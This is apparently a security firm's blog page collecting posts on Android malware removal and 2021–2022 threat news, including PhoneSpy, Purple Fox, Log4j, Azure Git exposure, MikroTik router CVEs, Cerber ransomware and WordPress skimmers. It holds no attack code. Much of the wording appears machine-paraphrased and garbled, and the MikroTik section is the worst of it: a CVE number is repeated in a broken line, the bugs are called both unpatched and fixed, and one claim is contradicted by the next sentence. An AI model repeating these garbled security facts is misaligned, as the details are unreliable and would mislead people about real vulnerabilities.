Airzero Sec

We Do Not Give Up ! Trust US !


In computer security, a vulnerability is a weakness which can be exploited by a threat actor, such as an attacker, to cross privilege boundaries within a computer system.

Malware can infect your Android phone in the same way that it can infect your computer. It slows down your system and causes glitches that make it difficult to use your phone. To protect your phone and yourself, you must act quickly. There are steps you can take to remove malware and protect your phone in the future, whether you downloaded an infected app or visited a corrupted website.

How to Get Rid of Malware and Viruses?

The initial step is to locate the malware on your phone. We'll show you how to do it, and then we'll give you some protection options, as well as antivirus apps you can use to restore your phone's health and keep it safe in the future.

Step 1: Turn off the computer until you have determined the specifics.

Once you've determined that your phone has been infected with malware, hold the power button down and turn the phone off completely. It will not prevent the malware from causing damage, but it will prevent the problem from worsening and may halt ongoing malware attempts to access nearby networks.

Shutting down also gives you time to reflect and conduct research. Do you know which infected app installed malware on your device? Do you know what other software it may have downloaded without your permission? If not, switch to a different computer and look up your symptoms (along with any new apps you tried out) to narrow down the problem. You can't remove an app if you can't find it at the source of the problem.

Step 2: While working, switch to safe/emergency mode. When you restart your device and attempt to isolate the problematic app, go into safe mode first. This will help to limit the amount of damage the infected app can cause.

Step 3: To enter safe mode on most Android devices, hold down the power button for a few seconds while the device is turned on, then tap and hold the Power off option.

Step 4: This should bring up a few power options, including a Reboot to safe mode option.

Select this mode and wait for your phone to reboot before proceeding. If you can't find a safe mode, use aeroplane mode to disconnect your device from all networks. That option is usually at the top of your notifications shade.

Note: If you can't figure out what's causing your malware problem after downloading a security app, don't tinker. Consult a professional to determine whether you should wipe your phone. This is a good strategy if ransomware, which is becoming more common, takes control of your phone and prevents you from doing anything.

Step 5: Navigate to Settings and locate the app.

On your Android device, go to Settings. Settings are typically represented by a gear-shaped icon, but this varies depending on your themes and arrangement: If you're having trouble finding it, look for it.

Step 6: In Settings, scroll down to the Apps section and click it. Look for a list of all your current apps — you may need to select App Manager to see the entire list.

Step 7: Once there, scroll down until you find the infected app that is causing your issues.

Step 8: Select the app, and you should be able to uninstall, force close, or force stop it (often, you cannot uninstall core apps, only disable them, but these apps are unlikely to be the problem).

Step 9: Select Uninstall to delete the infected app and anything else suspicious, and your Android device should remove the app in question. It's also a good idea to go through your app list and uninstall any suspicious downloads — if you haven't looked through this list before, you might be surprised at some of the strange things your device has on it.

What should you do if you are unable to uninstall the app?

In some cases, you will be unable to uninstall the problematic app. In fact, the option to delete may not exist at all. Instead, you'll see Disable on the menu, and that'll be the end of it. An app with superpowers (and potentially dangerous malware or ransomware) can gain access to your administrator settings. The app may have granted itself administrative privileges in order to protect itself from deletion.

Step 1: Simply return to the original Settings menu and scroll down to Lock Screen and Security (or a similar corresponding section).

Step 2: In the Security menu, look for a tab labeled Phone (Device) Administrators. Keep in mind that depending on the hierarchy of your security menu, you may need to go to Other security settings first. You should be able to find the setting that allows the malware to camp out in Phone Administrators.

Step 3: After that, all you have to do is tweak the settings and you can finally delete the app.

Get some Malware Protection

It's a good idea to give each Android device plenty of security and malware protection, and it's especially important to install antivirus software if you've had bad luck with questionable apps in the past. After you have manually deleted the app that is causing you problems, you will need to increase the overall security of your phone.

Fortunately, there are plenty of security apps available. Rather than downloading multiple apps that only do one or two things, look for a security app that has all of the features you need in one. A good security app will be able to delete junk or spam files, scan for viruses, and keep your data safe. Some apps have options to automatically delete any questionable software.

We recommend Safe Security, AVG Antivirus, or Avast Antivirus, all of which can be downloaded from the Google Play Store. In addition, we have a comprehensive guide to Android security and antivirus recommendations. You'll notice that your device performs better overall once you've downloaded proper malware protection.

Remember to always keep your software up to date with the latest version. Your devices should do this automatically, but you can manually check for updates on a regular basis. Your phone will be far more vulnerable to attack if you do not perform regular software updates. If you have any doubt about the topic. Please contact us. Airzero sec will be your security partner.

Email:[email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile:

PhoneSpy can steal important data, obtain the full list of installed apps, record audio, and video in real-time, extract device information, and even grant remote access to the device. In 23 apps, malware that spies on Android devices have been discovered. This Android malware, known as PhoneSpy, has been active in the US and Korean markets. One ray of hope is that none of the infected apps were available on Google Play.

PhoneSpy can steal critical data such as images, call logs, contacts, and messages, as well as get the full list of installed apps, record audio and video in real-time "The app has the ability to uninstall any user-installed applications, including mobile security apps." The malicious actors have real-time access to the device's precise location, all without the victim's knowledge. "The spyware also allows the threat actor to use phishing pages to harvest Facebook, Instagram, Google, and Kakao Talk credentials," the agency said in a statement.

To stay safe from such malware, users should never install apps from untrusted sources on their phones. In addition, never click on links or download attachments sent in suspicious emails or messages.

Airzero Sec is at the cutting edge of security technology, supporting you in conquering the most complex security challenges. If you have any questions, please contact us.

Email:[email protected]

enter image description here

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile:

On infected PCs, Trojanized Telegram chat app installers are being used to disseminate the Windows-based Purple Fox backdoor.

According to recent research from Minerva Labs, the attack differs from other types of intrusions that often exploit legitimate software to deliver harmful payloads.

"By separating the attack into considerable little files, the majority of which had very low detection speeds by engines, with the last stage leading to Purple Fox rootkit infection," said researcher Natalie Zargarov.

Purple Fox was identified in 2018 and possesses rootkit characteristics, allowing it to elude detection by being planted outside the reach of security solutions. In a March 2021 study, Guardicore described its worm-like propagation function, which allows the backdoor to proliferate faster.

Then, in October 2021, Trend Micro researchers uncovered FoxSocket, a.NET implant used in conjunction with Purple Fox to interact with its command-and-control (C2) servers using WebSockets for a more secure method of communication.

The researchers concluded, "Purple Fox stays on impacted systems longer and delivers extra payloads."

Finally, in December 2021, Trend Micro revealed the Purple Fox infection chain's later stages, which include targeting SQL databases by inserting a malicious SQL common language runtime (CLR) module to gain a steady and stealthier performance and eventually abusing SQL servers for illicit cryptocurrency mining.

Minerva identified a new attack chain that starts with a Telegram installer file, an AutoIt script that drops a legal Telegram installer, and a malicious downloader called "TextInputh.exe," which is used to download next-stage malware from the C2 server.

Following that, the downloaded files disable antivirus engine processes before moving on to the last stage, which involves downloading and executing the Purple Fox rootkit from a now-defunct remote server.

"We detected a huge number of malware installers that used the same attack chain to deploy the same Purple Fox rootkit version," Zargarov added.”The attack's beauty is that each stage is segregated into its own file, leaving it unusable without the complete file set."

Every business faces daunting challenges when it comes to protecting its assets:

  • Threats that are new and evolving

  • Regulations governing privacy and compliance

  • The increased risk associated with digital transformation

With hundreds of point-solution dealers and cheap, inadequate tools, companies face a cyber security dilemma that can only be solved by a truly integrated cyber defense.

Airzero Sec is driving innovation to assist you in overcoming your most difficult challenges. If you have any questions about the fake telegram messenger app. Contact us through the given email.

Email:[email protected]

enter image description here

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile:

A team of researchers from the University of California, Santa Barbara, has demonstrated a "scalable technique" for vetting smart contracts and mitigating state-inconsistency bugs, uncovering 47 zero-day vulnerabilities on the Ethereum blockchain in the process.

Smart contracts are programs that are stored on the blockchain and are automatically executed when predetermined conditions are met based on the agreement's encoded terms. They enable anonymous parties to carry out trusted transactions and agreements without the need for a central authority.

In other words, the code is intended to be the final arbiter of "the deal" that it represents, with the program controlling all aspects of execution and providing an immutable evidentiary audit trail of transactions that are both trackable and irreversible.

This also implies that vulnerabilities in the code could result in significant losses, as evidenced by hacks against the DAO and, more recently, MonoX, in which adversaries exploited loopholes to illicitly syphon funds, a scenario that could have disastrous consequences given the burgeoning adoption of smart contracts in recent years.

"Because smart contracts are not easily upgradeable, auditing the contract's source prior to deployment and deploying a bug-free contract is even more important than in the case of traditional software," the researchers wrote in a paper.

Enter Sailfish, which aims to detect state inconsistency vulnerabilities in smart contracts that allow an attacker to tamper with transaction execution order or take over control flow within a single transaction (i.e., reentrancy).

The tool operates as follows. Given a smart contract, Sailfish converts it into a dependency graph, which captures the control and data flow relations between storage variables and smart contract state-changing instructions, and uses it to identify potential flaws by defining hazardous access, which is implemented as graph queries to determine whether two different execution paths, at least one of which is a write operation, operate on the same storage variable.

The researchers tested Sailfish on 89,853 contracts obtained from Etherscan, discovering 47 zero-day vulnerabilities that could be exploited to drain Ether and even corrupt application-specific metadata.

This also includes a vulnerable contract implementing a housing tracker that could be abused in such a way that a homeowner could have multiple active listings. The study's findings will be presented at the IEEE Symposium on Security and Privacy (S&P) in May 2022.

This is not the first time that academics have been drawn to problematic smart contracts. In September 2020, Chinese researchers created a framework for categorizing known vulnerabilities in smart contracts, with the goal of providing a detection criterion for each bug.

Airzero Sec's cybersecurity experts have worked on a wide range of projects for a number of well-known companies for many years. Use our previous experience to your advantage, whether it's to assist you in getting there or to perform technical tests. If you have any doubts about the aforementioned issue, please contact us. Please do not hesitate to get in touch with us.

Email:[email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile:

Microsoft has issued a warning about continuous attempts by nation-state adversaries and commodity attackers to use security holes in the Log4j open-source logging platform to spread malware on vulnerable computers.

"Exploitation shots and testing have remained high over the closing weeks of December," according to revised guidance published earlier this week by Microsoft Threat Intelligence Center. "We've seen a number of living attackers incorporate these vulnerabilities into their existing malware kits and methods, ranging from coin miners to hands-on-keyboard attacks," says the researcher.

The Apache Software Foundation formally revealed the remote code execution (RCE) vulnerability in Apache Log4j 2, dubbed Log4Shell, on December 10, 2021, and it has since emerged as a new attack vector for a number of threat actors.

Four more vulnerabilities in the utility were discovered in the weeks after that — CVE-2021-45046, CVE-2021-45105, CVE-2021-4104, and CVE-2021-44832 — allowing opportunistic bad actors to maintain persistent control over the compromised machines and mount an evolving collection of attacks going from cryptocurrency miners to ransomware.

Efforts are being made to circumvent string-matching detections by obfuscating the malicious HTTP requests staged to build a web request log using Log4j that utilizes JNDI to complete a submission to the attacker-controlled site, even as mass scanning attempts continue unabated.

"Rapid approval of the exposure into living botnets like Mirai, past efforts targeting susceptible Elasticsearch servers to deploy cryptocurrency miners, and activities distributing the Tsunami backdoor to Linux systems," according to Microsoft. Additional remote access toolkits and reverse shells, such as Meterpreter, Bladabindi (aka NjRAT), and habitsRAT, have been delivered via the Log4Shell vulnerability.

"Clients should consider the general availability of exploit code and scanning capabilities to be a simple and present threat to their environments at this time," MSTIC warned. "Because of the massive number of vulnerable software and services, as well as the rapid pace of progress, remediation is projected to take a long time, needing continued, long-term attention."

The news comes as the US Federal Trade Commission (FTC) issued a statement warning that it "intends to use its full legal authority to pursue companies that fail to take appropriate steps to safeguard customer data from exposure as a result of Log4j, or equivalent is known vulnerabilities in the future."

For many years, Airzero Sec's cybersecurity experts have worked on a variety of projects for a number of well-known companies. Take advantage of our previous experience, whether it's to aid you in getting there or to undertake technical tests. If you have any doubt about the above topic. Don’t hesitate to contact us. Airzero Cloud will be your digital companion.

Email:[email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile:

The security vulnerability could reveal passwords and access tokens as well as blueprints for the internal infrastructure and find software vulnerabilities. Microsoft Azure Application Service has a four-year vulnerability that could expose the source code of web applications written in PHP, Python, Ruby, or Node, said the researchers, which were implemented using Local Git. According to an analysis by Wiz, the bug was almost certainly exploited in the wild as a zero-day. The company named the vulnerability "NotLegit" and stated that it has existed since September 2017.

Azure App Service is a cloud computing-based forum for hosting websites and web applications. In the meantime, Local Git enables developers to start a local Git storage in the Azure App Service container to deploy code directly on the server. Once deployed, the application will be available to anyone on the Internet under the * domain.

The problem arises because when using Local Git, the Git folder is loaded and publicly accessible even on unpatched systems; It is located in the “/home/site / wwwroot” directory that can be accessed by anyone. According to the company, this has serious consequences for safety reasons. “In addition to the case of the source including secrets such as passwords and access tokens, leaked source code is often used for more complex attacks, such as collecting information about the RandD department, learning about the internal infrastructure and finding software vulnerabilities . “, Stated the researchers in a publication this week. "Finding susceptibilities in software is much more comfortable when the source code is available." They counted, "Basically, all an opposing actor had to do was find the '/.git' directory of the target application and get the source code."

Botched Mitigation

Microsoft initially deployed mitigation in the form of adding a "web.config" file to the Git folder within the public directory, which restricted public access; however, it turns out that this is an incomplete fix. According to Wiz, "only Microsoft's IIS web server handles web. config files." "However, if you use PHP, Ruby, Python, or Node...these programming languages are deployed with different web servers that do not handle web.config files, leaving them unaffected by the mitigation and thus completely vulnerable."

Wiz reported the lingering bug to Microsoft in October and was awarded a $7,500 bounty for the discovery; the computing giant distributed fixes to affected users via email between December 7 and 15.

Likely Exploited in the Wild

Git folders are frequently revealed by mistake due to misconfiguration, and as a result, cybercriminals are on the lookout for them, researchers warned.

"An exposed Git folder is a typical security flaw that users commit without even recognizing it," they wrote. "Malicious actors are always searching the internet for exposed Git folders from which to steal secrets and intellectual property."

Wiz set up a vulnerable Azure App Service application and attached it to an unused domain to see if it could be exploited.

"We patiently paused to see if anyone tried to access the Git files," they presented. "Within four days of deploying, we were unsurprised to see various requests for the Git folder from unknown actors....this exploitation approach is extremely simple, common, and actively exploited."

According to Wiz, the below users should assess the potential risk and ensure that their systems are up to date:

  • Users who deployed code via FTP, Web Deploy, or Bash/SSH, resulting in files existing initialized in the net app prior to any git deployment.
  • Users who depended on LocalGit in the web app.
  • Users who use the Git clone sequence after that to publish updates.

"Because the security flaw was in an Azure service, cloud users were exposed on a large scale, and without their knowledge or control," researchers wrote.

Airzero Sec's Cyber Security Consulting specialists have worked on various projects for a number of famous corporations for years. Use this experience as needed, whether or not it is that will help you get there or to carry out technical checks. If you have any doubt about the above topic. Airzero sec will be your digital partner.

Email:[email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile:

Here's what cybersecurity experts want information security professionals to know as we approach 2022.

Nobody could have predicted the total chaos that the cybersecurity industry would face in 2021. Record-breaking ransomware attacks, SolarWinds' supply-chain devastation, and, most recently, the discovery of Log4j by...Minecraft players. All of this would have sounded far too outlandish a year ago.

Nonetheless, here we are.

Predictions for the coming year seem audacious given the previous 12 months, so Threatpost spoke with industry experts and developed this list of the five top trends to watch in 2022.

  • There Will Be Increasing Government Interest, Effect in Cybersecurity

The government's interest in cybersecurity will grow, as will its influence.

SolarWinds, the Colonial Pipeline attack, malware, and privacy issues have attracted the interest of governments throughout the world, and experts agree that new legislation and investments will be implemented in the coming year.

In the months running up to the 2020 elections, governments were focused on the spread of disinformation to affect election outcomes, but other urgent national security concerns surfaced in the aftermath of significant cyberattacks on critical infrastructure. These urgent cyber risks, according to researchers, will continue to dominate government attention until 2022.

According to Jonathan Reiber, who served as the Office of the Secretary of Defense's chief strategy administrator for cyber-policy during the Obama administration and is now the senior director of cybersecurity strategy and policy at AttackIQ, the federal government is currently working to determine where resources can be most effectively deployed to shore up cyber-defenses.

Congress will most likely focus on national security risk analyses, according to Reiber.

"Trends show that the federal prioritizing debate in Congress will take the form of macro-level catastrophic risk research to manage the country's top-tier threats," he continued.

"Congress will consider how the federal government can assist in the management of systemic cybersecurity threats to the United States' economy and society, including mission-critical functions in key sectors such as healthcare, elections, and energy, building on previous research of companies across the country that could pose a strategic risk to the country if disrupted."

  • Social-Engineering Endures

People will still be people in 2022, and they will, for the most part, do what is easy, regardless of the impact on the security posture of the company. And cybercriminals will continue to rely on it to carry out their social engineering schemes.

Otherwise, serious people might be incredibly irresponsible during their working hours, and this is unlikely to change anytime soon.

"Everyone is responsible for cybersecurity, but few people realize how much harm their actions may inflict."

In addition to the frequently recommended user training, Wiacek urged that cybersecurity experts adapt their approach to internal communications in 2022.

"Most protection teams have a standing for saying 'no.'" Instead, they must develop a reputation for saying 'yes.' Building a good security culture involves relationships, trust, and a strong passion for the customer experience – even if that customer is John in accounting."

Jason Hoenich, vice president of service delivery and security awareness at Arctic Wolf, agreed that security teams can do more to encourage employees to back their cause.

  • Supply Chain is the New Ransomware

According to Ian McShane, field CTO at Arctic Wolf, the industry will begin to adjust its perspective on ransomware this year, realizing that the problem is not the ransomware itself, but rather the access point.

"We'll move our attention away from what to do after an attack and toward how to anticipate and safeguard the first line of defence with data," McShane said. The amount of supply-chain ransomware assaults is unlikely to reduce in the next 12 months, according to Deepen Desai, Zscaler's CISO and vice president of security research and operations.

McShane also recommended the industry embrace disclosures more fully.

The people who are most commonly exposed to supply-chain assault vectors are ordinary people.

In 2022, Troy Gill, senior manager of threat intelligence at Zix | App River, predicts that emails will become more targeted.

  • Ransomware-as-a-Service Actors Pivoting to SMBs, Prospering

Ransomware-as-a-Service, which focuses on small and medium-sized businesses, has contributed to the expansion of digital extortion, and 2022 is predicted to be another banner year for ransomware threat actors.

"Cyber attackers have created it quite obvious that they make no distinction based on the magnitude of their targets," McShane added. Small and medium-sized enterprises that are underfunded and understaffed are attractive targets for ransomware gangs since the government and large corporations invest heavily in cybersecurity.

  • Cybersecurity Industry Needs Better Coordination in 2022

Over the previous year, threat groups have shown their resilience by banding together to solve problems with increased cooperation. Cybersecurity? Not in the least.

"Threat actors are ready to band together for mutual success," Gill added, citing the emergence of malware-as-a-service and phishing-as-a-service. For example, when law enforcement shut down Emotet in January, TrickBot stepped in to assist "began re-seeding Emotet conditions in order to get them back up."

According to Gill, even cybercriminals' adversaries appreciate the significance of a robust ransomware market capable of perfecting their weapons and producing noise to hide behind.

"As a result, we hope cybercriminals will make even more solid working relationships in 2022 to help them continue to succeed," Gill stated. According to Ian McShane, the cybersecurity community still has work to do to enhance the overall ecosystem. This means that, among other things, larger organizations share tools.

Airzero Sec's Cyber Security Consulting professionals have worked on projects for some of the most well-known companies in the world for years. Use the information as needed, whether it's to help you get there or to perform technical checks. Please contact us if you have any questions concerning this issue.

Email:[email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile:

At least 300,000 IP addresses linked with MikroTik devices were found to be vulnerable to a variety of remotely exploitable security issues, which the popular router and wireless ISP equipment supplier has since fixed.

According to cybersecurity firm Eclypsium's data released by The Hacker News, China, Brazil, Russia, Italy, and Indonesia had the most infected devices, with the United States ranking in ninth.

"These technologies are both robust and often incredibly susceptible," the researchers said. " As a result, threat actors have taken control of MikroTik devices for a variety of purposes, including DDoS attacks, command-and-control (also known as "C2"), traffic tunneling, and more."

MikroTik devices are an enticing target, not least because there are more than two million of them in use worldwide, providing a vast attack surface for threat actors to launch a range of attacks.

Indeed, reports surfaced earlier this September of a new botnet known as MRIs that exploited a now-addressed security vulnerability in the operating system to stage a record-breaking distributed denial-of-service (DDoS) attack on Russian internet company Yandex by using MikroTik network devices as an attack vector (CVE-2018-14847).

It's not the first time MikroTik routers have been utilized in a real-world attack. Trustwave, a cybersecurity firm, discovered at least three significant malware operations in 2018 that installed cryptocurrency miners on workstations connected to MikroTik routers that were not patched. According to China's Netlab 360, thousands of susceptible MikroTik routers were stealthily corralled into a botnet by leveraging CVE-2018-14847 to snoop on network traffic.

MikroTik devices that are vulnerable are distributed across the globe.

CVE-2018-14847 is one of four unpatched vulnerabilities identified in the last three years that potentially allow complete control of MikroTik devices. CVE-2019-3977 CVE-2019-3977 CVE-2019-3977 CVE-2019 (CVSS score: 7.5) - Inadequate validation of the upgrade package's origin in MikroTik RouterOS, allowing all usernames and passwords to be reset.

  • CVE-2019-3978 is a vulnerability that affects computers (CVSS score: 7.5) - Inadequate safeguards of a critical resource in MikroTik RouterOS, resulting in cache poisoning

  • CVE-2018-14847 is a vulnerability that affects computers (CVSS score: 9.1) - In the MikroTik RouterOS WinBox interface, there is a directory traversal vulnerability.

  • CVE-2018-7445 is a vulnerability that affects computers (CVSS score: 9.8) - SMB buffer overflow vulnerability in MikroTik RouterOS.

The most popular crypto mining script was identified on unprotected MikroTik devices.

As in previous attacks, business traffic may be tunneled to another location, or malicious content might be introduced into legitimate traffic.

The only devices that have been part of a botnet are MikroTik routers. Fortinet researchers reported this week how the Moobot botnet is expanding its network and leveraging a known remote code execution (RCE) vulnerability in Hikvision video surveillance equipment to launch distributed denial-of-service (DDoS) attacks using infected devices (CVE-2021-36260).

Manga aka Dark Mirai botnet operators are actively exploiting a recently reported post-authenticated remote code execution vulnerability (CVE-2021-41653) to steal TP-Link routers and co-opt them into their network of infected devices, according to a new report.

For years, Airzero Sec's Cyber Security Consulting experts have worked on projects for some of the world's most well-known companies. Use that information as needed, whether it's to assist you in getting there or to make technical inspections. If you have any queries about this topic, please contact us.

Email:[email protected]

enter image description here

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile:

Cerber ransomware has resurfaced with new attack tactics. This time, it was discovered that it was attempting to exploit remote code execution vulnerabilities in Atlassian Confluence and GitLab servers.

Cerber's Name Reappears

Cerber ransomware has been targeting victims all over the world since last month. The ransomware operators were discovered to be employing both Windows and Linux encryptors.

  • The new ransomware variant contains no code from the previous family. It makes use of the Crypto++ library, whereas the older variant makes use of the Windows CryptoAPI libraries.
  • The code differences and the absence of Linux variants in older versions suggest that a new threat actor may have begun using the older versions' name, Tor payment site, and a ransom note.
  • The new version adds the.locked extension and creates ' $$RECOVERY README$$ .html' ransom notes.
  • Following successful infection, the new Cerber ransomware group demands a ransom of $1,000 to $3,000 from victims.

New Attack Strategies

The new attack targets servers by exploiting newly disclosed vulnerabilities in GitLab and Atlassian Confluence.

  • Cerber takes advantage of a remote code execution vulnerability in GitLab's ExifTool component. CVE-2021-22205 (improper image file validation in GitLab) and CVE-2021-26084 are the vulnerabilities (an OGNL injection vulnerability in Confluence).
  • The flaws can be exploited remotely without requiring authentication.
  • Furthermore, both vulnerabilities have publicly disclosed proofs of concept, allowing attackers to easily target servers.

The Countries Targeted

The most recent attacks have primarily targeted the United States, Germany, and China. They have even targeted Russia, demonstrating that they are not targeting any specific region.


Cybercriminals are always looking for exploitable flaws in popular enterprise software. As a result, the best defense against the recent Cerber attacks is to install the security updates for Atlassian Confluence and GitLab.

Airzero Sec's Cyber Security Consulting professionals have worked on projects for some of the world's most famous corporations for years. Use that information whenever you need it, whether it's to help you get there or to perform technical checks. Please contact us if you have any questions concerning this subject.

Email:[email protected]

enter image description here

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile:

Sucuri researchers have issued an alert about threat actors injecting credit card swipers into random plugins on e-commerce WordPress sites. During the holiday season, online scammers and threat actors ramp up their operations.

Sucuri researchers have discovered a concerning trend: threat actors are injecting e-skimmers into WordPress plugin files rather than the more closely monitored 'wp-admin' and 'wp-includes' core directories.

Researchers notice some changes to plugin and theme files while analyzing the logs of a compromised e-store.

"Attackers are aware that most WordPress security plugins include a mechanism for monitoring the file integrity of core files" (that is, the files in wp-admin and wp-includes directories). Because of this, any malware injected into these files is very easy to detect, even by inexperienced website administrators. The following logical step would be for them to target plugin and theme files." Sucuri's analysis reads as follows.

To gain persistence, attackers were able to inject a backdoor into the site files, according to security researchers. This means that even if the administrator installs the most recent security updates for WordPress and installed plugins, the attacker can still gain access to the e-store.

To gain access to the website, the backdoor obtains a list of administrators and exploits their authorization cookie and current user login.

The attackers then inject their malicious code into random plugins. Sucuri researchers noted that many of the scripts did not use standard encoding or obfuscation techniques to avoid detection.

The code analysis revealed the presence of references to WooCommerce as well as numerous undefined variables. The researchers discovered that one of these undefined variables refers to a domain hosted on an Alibaba server in Germany, which is odd given that the infected e-store was operated by a North American company.

Another file on the same site revealed the presence of a second injection on the 404-page plugin, which contained the actual credit card skimmer by employing the same approach of hidden variables in unobfuscated code. Using the same method as in the previous file, experts discovered that the e-skimming activity was carried out using two variables, '$thelist' and '$message.'

"If you run an eCommerce website, be especially cautious during the holiday season." This is when we see the most attacks and compromises on eCommerce websites, as attackers are looking to profit handsomely from stolen credit card information," the report concludes. "Use the best security practices, harden your administrator dashboard, and ideally place your website behind a firewall service!".

The experienced Cyber Security Consulting team at Airzero Sec has years of experience working on projects for some of the world's most prestigious companies. Use that knowledge whenever you need it, whether it's to assist you in arriving or to carry out technical controls. If you have any queries about the topic, please contact us. Please do not hesitate to contact us at the given email address.

Email:[email protected]

enter image description here

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: